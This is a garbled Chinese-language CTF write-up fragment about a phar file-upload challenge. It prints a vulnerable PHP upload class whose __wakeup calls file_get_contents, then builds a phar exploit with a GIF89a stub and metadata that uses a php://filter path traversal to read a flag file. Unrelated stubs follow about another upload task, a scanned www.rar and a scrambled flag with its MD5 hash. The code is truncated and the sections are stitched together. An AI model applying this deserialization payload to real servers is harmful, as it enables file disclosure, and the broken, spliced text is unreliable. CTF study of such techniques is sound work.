upload

upload,一道phar文件上传题目

filename = $_FILES["file"]["name"];$this->ext = end(explode(".", $_FILES["file"]["name"]));$this->size = $_FILES["file"]["size"] / 1024;$this->Valid_ext = array("gif", "jpeg", "jpg", "png");//限制了后缀的类型}public function start(){return $this->check();}private function check(){if(file_exists($this->filename)){return "Image already exsists";}elseif(!in_array($this->ext, $this->Valid_ext)){return "Only Image Can Be Uploaded";}else{return $this->move();}}private function move(){move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$this->filename);return "Upload succsess!";}public function __wakeup(){echo file_get_contents($this->filename);}
}class check_img{public $img_name;public function __construct(){$this->img_name = $_GET['img_name'];}public function img_check(){if(file_exists($this->img_name)){return "Image exsists";}else{return "Image not exsists";}}
}

public function __wakeup(){
        echo file_get_contents($this->filename);
    }这一段可以看出file_get_contents触发phar序列化，然后我们构造就可以

filename="php://filter/read=convert.base64-encode/resource=../../../../flag";
$phar = new Phar('aaaaaaa.phar');
$phar->startBuffering();
$phar->setStub('GIF89a'.'');
$phar->setMetadata($a);
$phar->addFromString('test.txt', 'test');
$phar->stopBuffering();
?>

也就试路径这麻烦一点

 easy_upload easy_upload

扫描目录扫到一个www.rar

g0at无意间发现了被打乱的flag：I{i?8Sms??Cd_1?T51??F_1?}
但是好像缺了不少东西，flag的md5值已经通过py交易得到了：88875458bdd87af5dd2e3c750e534741